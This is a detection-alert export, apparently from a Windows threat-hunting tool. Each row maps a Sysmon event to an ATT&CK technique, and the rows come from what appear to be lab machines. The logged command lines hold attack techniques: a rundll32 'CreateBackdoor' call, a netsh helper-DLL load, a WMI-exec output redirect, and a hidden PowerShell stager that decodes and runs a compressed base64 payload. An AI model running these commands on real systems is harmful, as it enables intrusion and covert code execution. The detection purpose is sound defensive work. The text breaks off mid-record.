"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
</TimeCreated>
<EventRecordID>243556</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
<Data Name=""ProcessId"">6136</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-15T15:00:15.695416Z"">
</TimeCreated>
<EventRecordID>589974</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3524"" ThreadID=""4288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-15 15:00:14.467</Data>
<Data Name=""ProcessGuid"">747F3D96-CF4B-5FD8-0000-00101AD58700</Data>
<Data Name=""ProcessId"">6976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">50007</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.17</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10CLONE</Data>
<Data Name=""DestinationPort"">135</Data>
<Data Name=""DestinationPortName"">epmap</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.485479Z"">
</TimeCreated>
<EventRecordID>4947</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.336</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-001051388B00</Data>
<Data Name=""ProcessId"">3824</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh.exe add helper AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
</TimeCreated>
<EventRecordID>243556</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
<Data Name=""ProcessId"">6136</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
</TimeCreated>
<EventRecordID>421225</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
<Data Name=""ProcessId"">4864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
</TimeCreated>
<EventRecordID>421225</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
<Data Name=""ProcessId"">4864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.676930Z"">
</TimeCreated>
<EventRecordID>421225</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.675</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001061BD3300</Data>
<Data Name=""ProcessId"">4864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.106089Z"">
</TimeCreated>
<EventRecordID>9808</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:51.965</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
<Data Name=""ParentProcessId"">3348</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.286383Z"">
</TimeCreated>
<EventRecordID>4946</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.273</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010A7318B00</Data>
<Data Name=""ProcessId"">4148</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh trace show status </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.106089Z"">
</TimeCreated>
<EventRecordID>9808</EventRecordID>
<Correlation>
